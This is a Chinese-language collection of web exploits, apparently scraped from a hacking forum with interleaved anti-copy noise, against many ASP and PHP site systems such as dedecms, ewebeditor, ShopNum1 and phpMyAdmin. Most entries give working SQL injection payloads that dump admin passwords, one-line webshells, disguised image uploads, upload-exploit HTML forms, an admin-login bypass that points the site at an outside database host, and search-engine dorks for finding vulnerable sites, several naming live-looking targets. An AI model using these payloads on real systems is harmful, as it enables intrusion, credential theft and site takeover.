启航企业建站系统 cookie注入漏洞通杀所有版本
7 @7 C4 O3 z$ q0 @
. ?7 [! N; a3 c' V7 Q直接上exploit:
1 M4 k0 f0 I+ Qjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));! O4 g3 b5 ^7 n a9 t/ y
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
" F3 |& e8 `/ Q2 a$ F* ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: f9 \5 M9 u, X% O0 U1 ?8 }2 j
Asprain论坛 注册用户 上传图片就可拿到webshell
' e5 g6 X% @- u6 k$ ]1 L: B
8 d$ @, i/ [5 n* K/ g. ^: LAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。9 Y* p ]# r6 C5 Y7 M4 g0 D
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
8 h/ }2 `6 z# ~; @0 |2.gif 为一小图片文件,一定要小,比如qq表情图片; ^; n' K. z" U3 c
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用" @; r7 M8 ?8 y8 J7 [% i
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
; m5 W2 s# X& w2 R2 a/ i5.q.asp;.gif
n5 ]+ V/ X8 [, Ygoogle:Powered by Asprain
# F3 P/ T5 ?( I8 J- K/ f0 F* S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 ?7 Q2 n8 l7 O3 t1 F2 D' h& s
+ j4 s0 P; a9 g0 a1 o) t' u) aShopNum1全部系统存在上传漏洞。
m B/ y; Y. m) ?
1 u+ a3 ?& b* C! u" Q首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。" I' h% `& k/ V% Z, [ }
按说明 提示登录后台。。
! Z: o$ q4 q& w4 Z( q在后台功能页面->附件管理->附件列表6 e; b. ]/ F( A0 F& H; W
可以直接上传.aspx 后缀木马1 L! _) j' F: G/ t* Y: [1 o9 d) ]
http://demo.shopnum1.com/upload/20110720083822500.aspx Q+ I: {* P- D) a
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, H6 L- g7 ]/ G- c/ p
( A) V2 X& g* B o: V牛牛CMS中小企业网站管理系统 上传漏洞# n" Q. ]6 t5 p, A) s
% ]! B$ |) m+ F
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
6 W% g) K) {0 L后台:admin/login.asp+ _1 a( O6 i: H: w& O, i
ewebeditor 5.5 Nday
5 e. ~7 b: {9 o5 _% \; q! W# lexp:
+ |. V% n9 q, m7 H+ z& v4 S: r5 x<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
, K: k8 N/ p" O<input?type=file?name=uploadfile?size=100><br><br>?
4 N9 y& O( ^# b, O: U9 I6 B. V<input?type=submit?value=upload>?
# L1 X4 Q/ |( n' s7 s; p$ |: S7 Q! ]</form>
9 |" M3 i+ V3 b7 X# Ips:先上传小马. C `( e- ?* z6 C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏1 S0 U5 B5 }( J7 p; T# q( L
7 S* b+ ]# \/ K: G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# V$ {* z5 H$ A2 y' ]/ B; `6 a5 J* g j% u/ Y! O( m! M4 f
YothCMS 遍历目录漏洞
1 e; o$ \9 O, t3 H- w+ A: }- Y! Y! V ], `
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
4 m; \& m) U2 @- b7 C默认后台:admin/login.asp& u8 V: P) X# e. ]6 d) z6 r$ C
遍历目录:# S( D) l7 U0 B+ H; G( d0 `
ewebeditor/manage/upload.asp?id=1&dir=../1 }3 Z, B& ]' _
data:1 y8 h+ f8 @; s' l& p3 U& M
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
4 ]9 ]$ o# e$ r. D8 A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ Y1 [4 ~% u0 i4 N) y7 o0 Z
3 P# W' R/ Z) y+ [& ~; p7 t7 FNet112企业建站系统 1.04 ^; z) j4 K% @
u# k! n9 ` {0 |
源码简介:
f% t2 R0 w; v$ L7 i/ KNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。/ F# F2 z& N/ S) d, p
添加管理员:) k9 h8 J$ a+ F* |3 r
http://www.0855.tv/admin/admin.asp?action=add&level=2
; Z& D; D( J, ^4 j. a1 F其实加不加都不是很重要,后台文件都没怎么作验证。
5 g4 W: B% V8 z! \0 @上传路径:9 b& T9 Y! E; E3 e0 V8 b
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2001 u0 ~" \1 c q' {- [
http://www.0855.tv/inc/Upfile.asp?Stype=2
& [ |9 q. n, k8 A怎么利用自己研究。
' Z: s/ r8 k! X F* Y6 k遍历目录:
% m ]$ W7 ?& ~4 ^http://www.0855.tv/admin/upfile.asp?path=../..' C+ w4 C/ v) j, \
如:& t+ C' r" _& ~4 X5 C
http://www.0855.tv/admin/upfile.asp?path=../admin. W2 s( C5 N' \: M4 T6 r
http://www.0855.tv/admin/upfile.asp?path=../data* z" p* j0 N( N0 F" O* Z( i4 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 V5 D! m% N9 Z3 u8 n0 g
( r, E3 \/ z A! u' F3 o z! h; s' G! @易和阳光购物商城通杀 上传漏洞+ E# A2 ^; ]. f5 L$ H" g! D
6 Q* x2 D6 g* ~$ B9 V* [
前提要求是IIS6.0+asp坏境。! {2 ~; X& c& k0 W4 g g' d
漏洞文件Iheeo_upfile.asp
, n9 [ ^' f% _- x! L: m& \4 M过滤不严.直接可以iis6.0上传
1 S- a$ [/ ~% u# }1 x% T; ?把ASP木马改成0855.asp;1.gif! v# K" D. f' V: P
直接放到明小子上传
6 M! a5 i# A9 w. G/ b6 aGoogle搜索:inurl:product.asp?Iheeoid=
3 ]; @# j# d4 m! f6 K( H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! ]' x2 {' w! z" |3 T$ U' B8 M
! X4 J' E9 t; wphpmyadmin后台4种拿shell方法, j( x3 S5 q$ L% N& Z- C* e* ^; }
9 v6 X3 [1 c7 N, @/ o: f6 b5 O z, X方法一:- m: @1 z8 ~ [- d6 b1 c
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
: Q- d6 U0 E4 p! mINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');( h9 d- T5 i2 f5 m8 x5 O% ?$ H
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';) ]3 G# s% @, o2 ^* J
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
: {5 x; R8 `" c9 i8 K+ x7 `3 E" o一句话连接密码:xiaoma
% W* K2 i+ r: d8 ~方法二:
6 D/ Q/ U0 @" z9 u9 gCreate TABLE xiaoma (xiaoma1 text NOT NULL);- s3 j4 A9 {, C- h9 v
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');: A, ? \6 V" o8 p
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
: R2 @4 M2 t' C+ N+ MDrop TABLE IF EXISTS xiaoma;6 A' F" H* `3 v: N4 D
方法三:
7 E2 \- E0 x; X# _读取文件内容: select load_file('E:/xamp/www/s.php');
1 D, \7 q$ [, A) [! t$ ]写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'7 b6 J3 C( l7 u
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'+ R+ Z( j8 _$ |* x: X2 }
方法四:
# D7 W2 R" ], y% Hselect load_file('E:/xamp/www/xiaoma.php');9 i0 ?+ V8 O- {5 e4 U% f( C8 j
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
! E6 r; W7 v. N# O- l然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir2 k+ p! s: D1 ?, }3 w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# V$ b7 n. C& f1 t0 a h- a/ \
6 P: i' I! _0 j0 ]& i/ C传信网络独立开发网站源码0day漏洞
& f5 f+ n# X7 I
5 V) q& P/ g" B, F' V后台system/login.asp
& }9 y: O. R; w进了后台有个ewebeditor3 w0 M; z" S7 q8 s/ f. \$ b
Google 搜索inurl:product1.asp?tyc=1 |. T! e0 y/ g9 b' [ d# H0 S
编辑器漏洞默认后台ubbcode/admin_login.asp
8 x @# q4 U3 [4 d2 g: J9 s数据库ubbcode/db/ewebeditor.mdb L) G s% [1 l4 F1 c; C) ~: v
默认账号密码yzm 111111
Q3 ^& m8 R1 b0 O3 Z. X& ^
r1 c3 O6 o7 d; E0 e1 t9 O拿webshell方法+ L+ [( A* i; _% x" J
登陆后台点击“样式管理”-选择新增样式 / Y0 K6 O7 M4 a M" D2 y
样式名称:scriptkiddies 随便写 ' g+ z% X9 V, F5 G
路径模式:选择绝对路径 , Z- R) A8 v, z6 e5 F
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
4 a4 \6 N: s5 x' d图片类型比如就是我们要上传的ASP木马格式, Y( R/ T4 Q8 @
上传路径:/+ ?& q+ S5 W, l
图片限制:写上1000 免的上不了我们的asp木马
9 x7 w6 q/ [" E, B3 X T上传内容不要写
# p! {, h9 \6 o2 w" M1 h) t3 J可以提交了
' ~& F# @4 O, N5 {1 e/ Q样式增加成功!
( O/ s1 N! v1 \3 }, B, e% Z' h返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 6 o7 z! y% Q3 [/ }0 Z# J) U
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
" ]; U) f* r: A网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies/ Z# P; Y2 V, b- r" l6 G" b0 p
上ASP木马 回车 等到路径
+ k! V3 H+ C( f( y' c2 U1 e
' }5 t4 `4 h& |- y后台:system/login.asp
) R: V! M% L0 C3 ?3 j; E/ F% GExp:* w) p7 \( K0 c6 T- p9 z1 q3 U
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master6 P6 d5 V' V9 Q5 q. F( b5 I
测试:
N5 b/ M; c" g" V; ^5 _http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 F1 v7 s4 B2 E5 y0 R7 v
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
' j* N& B+ |. ?! A6 B' K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- p& w/ Q. q5 ]+ D: _; O) _% m9 p, o( j
foosun 0day 最新注入漏洞0 m4 ]7 Z- u$ w% v6 X
& f* _9 G5 D. K9 t0 B
漏洞文件:www.xxx.com/user/SetNextOptions.asp5 [& b1 q* H- [: X) A
利用简单的方法:
9 S5 w) k1 s o% b; N7 A& [暴管理员帐号:
! o" d/ Z1 H4 e0 [; w+ v) O0 |http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ B1 K" h7 p( n4 C; B) `暴管理员密码:
( p. n- ~2 \. G" J( z5 I* V xhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,9 B s, P% z! Y. g/ u4 }8 q# R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# N6 `' X! A0 ], o, [, R4 \7 s. D" Q4 h7 H, h0 P0 H
网站程序的版权未知!
$ p) p0 _4 b# v J
) k% G8 J9 [9 V3 j1 W3 V默认网站数据库:+ d( P5 X/ l% J( \- q6 ^
www.i0day.com/data/nxnews.mdb
5 n# s3 z5 ^' }" m0 \1 |ewebeditor 在线编辑器:
) P1 j! a. ^* z; F4 H) H6 f编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb/ L. T% n1 V# q& V" `4 A6 D0 i
登录地址:ewebeditor/admin_login.asp5 T- l7 l' t" U( n4 b1 F
默认密码:admin admin! m- Z- F9 n1 B# Q$ s/ b. P
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
* h: B" h: r+ P2 e6 u! G7 Y( W0 z, h$ u& W$ [
Sql注入漏洞:; q2 M/ H9 ?$ z3 U, u( K
http://www.i0day.com/detail.asp?id=12
; H, D4 r D- y! W6 _) aexp:
0 j* F' P `/ K) r' Junion select 1,admin,password,4,5,6,7,8 from admin
5 J( Z( S3 G9 w# p# Y# T) ~, g( X爆出明文帐号/密码; Q m' x! W) a& _' Y7 `
$ y- q( {. j! X8 q; a上传漏洞:
' P* M4 A2 V3 B1 Y后台+upfile.asp
$ G, U- ~- o1 U. r4 Y+ O如:! O# X6 v: X# Y O" A
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。) C) q; U6 d* M9 M, m" ^
shell的地址:网址+后台+成功上传的马$ D, B7 v/ W5 l3 \6 k0 o& s
google:inurl:news.asp?lanmuName=+ \" z5 g; X' o. m" K
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) T5 }' A: K; |: d4 s$ G0 A* w$ D" p1 t7 R$ v) L8 s/ k/ u) _
dedecms最新0day利用不进后台直接拿WEBSHELL `/ ]% t4 W0 t9 L4 g4 [
3 r( O' A6 H6 B2 @& g& P; O拿webshell的方法如下:, E! L2 O4 q1 g- b0 w; V
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.1 B) @$ e! K3 h5 S
前题条件,必须准备好自己的dede数据库,然后插入数据:/ _7 e- A$ v7 ?, t$ V
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); W2 L: b$ g9 Y- Q! w$ o1 V
/ w( `- w) X9 d$ z2 O再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
& [" v4 V7 n1 j% i# N @+ S# A<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
6 _" Q& `2 E, u; D<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
2 d2 ^( x/ P B" m& q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& b; n1 I* e0 l/ b7 S, H2 ? r<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />/ N; e+ ~2 k( w' p' T
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" I# f, t# T5 M" [# w<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# O8 {' ]# Y% b9 }# |- M, a; W6 W<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />) N0 w! P @" Y M# ?1 s1 _
<input type="text" value="true" name="nocache" style="width:400">" Q* @; C: g+ K6 _: ^! h0 [
<input type="submit" value="提交" name="QuickSearchBtn"><br />. u* x+ [* O. H4 K, k/ ^
</form>) T8 N# z$ T& X6 |$ G
<script>: Q5 i3 x; _- Q+ R' J3 F5 C
function addaction()- K. ] z6 A1 E, I( t6 [
{
4 l. ]4 S! A2 `/ W Udocument.QuickSearch.action=document.QuickSearch.doaction.value;+ b2 q/ ?; t' v7 M
}
0 \4 V1 ~, ^3 F- x# H: M</script>4 j/ N! [% m4 E( O, s
-----------------------------------------------------------------------------------------------------------------------------------------------# U$ G* H ~7 ^# e& e p
" c; V) j. O! n/ F4 o
dedecms织梦暴最新严重0day漏洞
" \, T" S; V" [bug被利用步骤如下:
' ^2 u' T" g1 ehttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root- `2 a; A) |- x! @/ Y8 D1 M5 Y
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
' r( R5 Q; i6 f; v; I, Y; I W# v-------------------------------------------------------------------------------------------------------------------------------------------
" X, o7 h, I! ]- P. H' v6 T+ ?( m% s9 e7 j" u% Z
多多淘宝客程序上传漏洞
7 F4 S# X- C- M; H" T2 G漏洞页面:& v3 C4 V1 q! Q. ]7 h- x5 U
admin\upload_pic.php
- v; `# s7 [0 B/ `: ?- R2 R传送门:$ f' G: C$ z) a' }$ n: |
http://www.www.com/admin/upload_pic.php?uploadtext=slide1" O/ y/ A# s1 A5 K
PS:copy张图片马 直接 xxx.php 上传抓包地址!8 |8 j' V W7 d" q5 ?
------------------------------------------------------------------------------------------------------------------------------------------------------& P& C$ k& D$ ]7 w; @. X8 }
: a1 Y. w0 M. L! t无忧公司系统ASP专业版后台上传漏洞7 l' v* L$ |% h6 ^' w6 K% @
漏洞文件 后台上传
l+ \" t" [1 u3 v9 s+ uadmin/uploadPic.asp+ T- O; a8 j0 _+ E5 P- A6 ^
漏洞利用 这个漏洞好像是雷池的3 i- J6 Y, b: G7 U
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1* w6 h2 V( Y, L) I$ S; l4 d" I7 H
等到的webshell路径:
) t$ Z) A4 K" E8 e \/UploadFiles/scriptkiddies.asp;_2.gif
# ]2 F/ I% U; d4 W2 b2 I( _---------------------------------------------------------------------------------------------------------------------------------------------------# H. q9 l5 X {3 m+ t
; x6 X$ z/ `- Q$ O) |
住哪酒店分销联盟系统20105 A& ~8 [- P1 O1 h
Search:, `% H! K( S$ K' N& V! F% ^
inurl:index.php?m=hotelinfo1 h" s' c; v- O p# T$ ?( s
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
( X8 x" D7 V3 {# k默认后台:index.php?m=admin/login* D; O, ^+ K8 O
--------------------------------------------------------------------------------------------------------------------------------------------------6 q# i$ m, r3 T! B5 K: O$ K
8 u9 C% d+ B+ t) @5 E, q
inurl:info_Print.asp?ArticleID=
0 u7 k* {7 o! Y& l4 t9 [. |3 N后台 ad_login.asp
9 n; Q; v- h; Y2 A% ^4 ~爆管理员密码:6 a) _5 S/ d' `* L" W4 n+ h) ]
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin! B8 ?, E7 q8 t$ U8 e/ m
------------------------------------------------------------------------------------------------------------------------------------------------------------
' |) a. ^ d- s0 J
- v; T# X) O0 [搜索框漏洞!
- X9 D8 |2 |" t- @* W%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
1 P% N" h8 D+ e3 s--------------------------------------------------------------------------------------------------------------------------------------------------------, M* `' R8 U9 C- N$ b
9 }& H' H/ a& E8 V+ d$ w关键字:* e; K) n: w1 H1 k. f
inurl:/reg_TemletSel.asp?step=27 ?- W: c% E* V. F
或者
3 n. I: ^: w- B8 `' p0 G电子商务自助建站--您理想的助手
+ _$ O0 ^$ p1 o: l-------------------------------------------------------------------------------------------------------------------------------------------------
/ |7 O$ e2 D, ~+ @7 a2 q* ]2 V5 `) L8 N
iGiveTest 2.1.0注入漏洞
& L: j/ S& S/ s/ u. HVersion: <= 2.1.0
0 c; a/ \9 Z; C Q. e( Z6 T" W# Homepage: http://iGiveTest.com/) G. X9 q' |0 J( Q# |7 M9 `7 i+ u
谷歌关键字: “Powered by iGiveTest”
! i( R' _6 N" o( A. E7 n% k随便注册一个帐号。然后暴管理员帐号和密码
h0 }3 n7 p9 N( R1 n; j) B0 h3 Ehttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
* m- Y6 E' ?3 R+ g" s- o; W------------------------------------------------------------------------------------------------------------------------------------------------2 \% |; G9 L Z) F/ C; L5 M- V
+ Z1 A, K5 g7 Y; v# \: fCKXP网上书店注入漏洞 A" e4 ?( O t9 R
工具加表:shop_admin 加字段:admin
) k! A V( m+ M( @. S# p后台:admin/login.asp
5 K/ o! V2 v4 f% d* N/ K; [8 Z6 a7 s登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 H7 Y2 ?' S: m/ ~$ j/ I" @4 x0 ?inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 I* @0 c4 f* f7 E! c) i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ h7 a6 R/ ]7 W% ~$ n, n
1 Q" X# s1 k, H
段富超个人网站系统留言本写马漏洞6 @/ L& q9 h/ [0 h
源码下载:http://www.mycodes.net/24/2149.htm
2 z2 _' \9 j2 ?! m1 X3 o1 }0 D( Saddgbook.asp 提交一句话。" j: Y. R+ D- A7 Y
连接: http://www.xxxx.tv/date/date3f.asp
1 ~' U6 Q6 o' L x E/ sgoogle:为防批量,特略!
5 q% n/ F a: ]; L1 S( D-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' r# y9 D# {7 \% m. f3 N/ z3 a
/ @+ V& n0 \5 m. y智有道专业旅游系统v1.0 注入及列目录漏洞
" L/ _& ?4 n0 ]0 q- b. _% `默认后台路径:/admin/login.asp
* \3 Z# F. u6 b默认管理员:admin
. O! J8 z9 [; ~1 I8 U" d4 `% L默认密码:123456
1 c D$ E+ ]( ]0 e2 JSQL EXP Tset:1 D+ o9 F2 ]7 a& |* G) K
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin% h6 N! Z- p8 p/ z1 T3 r6 o
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* K( `& O+ c4 U1 [" g8 ~ [
" C3 g+ d4 F# V. Fewebeditor(PHP) Ver 3.8 本任意文件上传0day1 d5 j: |( b# b3 B
EXP:( n4 `$ ]; y5 g9 p, V7 Y
<title>eWebeditoR3.8 for php任意文件上EXP</title>9 O" s" m9 M! z# Y& b! ?
<form action="" method=post enctype="multip' G1 P& A' F5 L! q5 g
art/form-data"> 2 C; v8 o0 {) J- x! u3 a: r
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
0 {4 E, N, {1 l BURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> % ?3 o! P' [! V8 V. c
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ) G) Q2 [5 J @) f
file:<input type=file name="uploadfile"><br> + h/ [6 Y1 O7 S' o( T) L
<input type=button value=submit onclick=fsubmit()> 4 Q! ]. K' c/ j' f ^
</form><br>
: f6 ?% K& s% q; l( T<script>
4 ?; E1 I* ^8 t7 S- E, kfunction fsubmit(){ : z" N5 d/ v t! h5 f$ n9 F
form = document.forms[0];
, e' X! c; O7 V/ U9 k$ A4 @' Xform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
( [6 [/ A5 Q. n$ g/ A1 ?5 N8 talert(form.action); 0 I, p6 S3 e4 x" g! y
form.submit();
* W7 i( Z. i8 {- c7 D# j+ `}
. x# s$ e4 r2 @8 @8 v</script>3 D) F5 A V. }' g2 k
注意修改里面ewebeditor的名称还有路径。9 h- o8 }& A( c$ C, M
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 u" x6 E. o6 `" J2 `+ x
3 ?$ i. g l$ u提交’时提示ip被记录 防注入系统的利用
) z& X+ e5 V3 W: W1 i7 |$ W# H- c网址:http://www.xxx.com/newslist.asp?id=122′
" z' Z5 L+ [" ?+ J& e& i& I提示“你的操作已被记录!”等信息。
; d" M0 b5 w F* y6 v利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。: h& m2 ~6 _& B. ^# a
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- P! t* R( R6 S- ^5 F: V9 x: a% H
. ]+ n2 s4 P/ ]$ L2 O% [
西部商务网站管理系统 批量拿shell-0day
$ M1 G4 m; B6 F' K5 x! c( H% M# R这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1 K) C- I7 ^7 `' P5 L( W1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛6 a2 ?$ z) `- I1 x! t: F0 {
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合, G$ w; ?' c, n" |4 l* z
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
6 A7 R9 q7 R1 _, u. ~---------------------------------------------------------------------------------------------------------------------------------------------------------------------------% C" j* W( K3 J/ A9 E
) K9 ^4 t: J, R' {JspRun!6.0 论坛管理后台注入漏洞7 ~/ ? _4 U6 K
9 C2 _) {: V. r' R: y
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:1 R; [, B# h1 H# x
JspRun!6.0
( [0 o8 I" l* B7 b# v漏洞描述:
' h n7 ^8 e7 O7 l4 X. lJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
- C7 ]8 y$ @" g- G7 H% |在处理后台提交的文件中ForumManageAction.java第1940行
9 W) P, F% a2 h F! k2 oString export = request.getParameter("export");//直接获取,没有安全过滤
7 Y6 m6 `6 `6 W# v3 `if(export!=null){& h/ E: O! [$ b
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
3 _, J2 z0 ^6 V$ L% m' Uif(styles==null||styles.size()==0){/ O' V) `( r* Z" z7 j/ E2 t' p* l
<*参考9 Q1 H& C9 Z/ Q! o$ F8 e4 j
nuanfan@gmail.com
) r5 K% O* A) ]1 a*> SEBUG安全建议:) |, z @# q8 N9 R
www.jsprun.net
% E; T3 I8 X" _- ]8 M(1)安全过滤变量export
- x+ G4 X4 Y+ P {(2)在查询语句中使用占位符
2 M2 {! [. M& n5 T* Q8 M7 T------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ S8 F8 X8 R( J5 C0 J2 `+ M6 y X- ]+ M0 y1 \
乌邦图企业网站系统 cookies 注入% ]1 o$ X$ M: q1 K
1 L/ ^4 a7 {) `程序完整登陆后台:/admin/login.asp5 P; |9 R* V+ p: E7 {# D
默认登陆帐号:admin 密码:admin888
, [2 J9 n% E! c" j1 C' W语句:(前面加个空格)- H2 b- O7 j. n* l: E. v [
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin% U/ V: F! Q/ j" K1 R4 u3 n
或者是16个字段:
, O3 h+ T0 e3 w/ wand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin9 n. \' U/ l$ X
爆不出来自己猜字段。
4 z( R% d3 k2 f! J/ p; L注入点:http://www.untnt.com/shownews.asp?=88
- n: q; _! H, s2 R5 f% ngetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
6 s9 E" S6 b! v1 z6 s1 q9 v关键字:
5 e2 G8 d% V" X- c3 q7 a2 L5 f7 c6 T$ einurl:shownews?asp.id=" \8 @0 a) x( ]6 @1 z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ [* ]: T3 A- b! o$ J9 F0 q* B# f- M ~% b
CKXP网上书店注入漏洞8 K+ t3 R2 [" s+ E* d! u A
- |5 z( `7 F# G2 }8 u& v. K工具加表:shop_admin 加字段:admin) u# l' \7 k$ |8 z& _1 x
后台:admin/login.asp 3 O I1 w' v) E
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
; t% x+ }5 i$ `# Linurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
( i% s# N& X& S1 v% i, p---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 Z: h7 S' ^' k0 P, k( N
4 f* `1 o: c' MYxShop易想购物商城4.7.1版本任意文件上传漏洞3 a; q, J5 L" F4 c, V/ ~
- ?' _/ J# c$ M# F' _1 xhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
